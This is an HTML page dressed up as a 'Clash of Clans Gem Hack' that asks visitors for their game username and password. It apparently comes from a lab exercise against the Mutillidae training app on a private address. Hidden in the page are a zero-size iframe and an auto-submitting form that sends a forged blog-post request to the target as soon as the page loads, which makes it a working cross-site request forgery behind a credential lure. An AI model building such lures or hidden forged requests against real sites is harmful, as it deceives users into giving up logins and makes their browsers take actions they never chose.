<html>

<head>
    <title>Clash of Clans Gem Hack</title>
</head>

<body>

    <a href="index.html">Back to the main page</a>

    <center>
        <img src="coc.png" width="100px" height="100px">
        <h1>How many gems do you want?</h1>
        <input type="radio" name="gems" value="100"> 100
        <input type="radio" name="gems" value="100"> 500
        <input type="radio" name="gems" value="100"> 2500
        <input type="radio" name="gems" value="100"> 10000

        <p>Enter your Clash of Clans username and password:</p>

        <form id="dummy" action="success.html">
            <label for="username">Username: </label>
            <input type="text" name="username" value=""><br><br>

            <label for="password">Password: </label>
            <input type="password" name="password" value="">
        </form>

        <button type="submit" form="dummy" value="Submit">Get Gems!!!</button>
        </center>

        <!-- Form target frame to avoid redirection -->
        <iframe id="iframe" name="my_iframe" style="position: absolute;width:0;height:0;border:0;"></iframe>

        <!-- CSRF - Add blog post -->
        <form name="csrf" id="csrf" target="my_iframe"
            action="http://192.168.56.101/mutillidae/index.php?page=add-to-your-blog.php" method="POST" style="display: block;">
            <input type="hidden" name="page" value="add&#45;to&#45;your&#45;blog&#46;php">
            <input type="hidden" name='csrf&#45;token' value=''>
            <input type="hidden" name='blog&#95;entry' value='CSRF attack has been initiated succesfully.'>
            <input type="hidden" name='add&#45;to&#45;your&#45;blog&#45;php&#45;submit&#45;button' value='Save&#32:Blog&#32:Entry'>
        </form>
        
        <!-- Send POST request -->
        <script>
            document.csrf.submit();
        </script>

</body>

</html>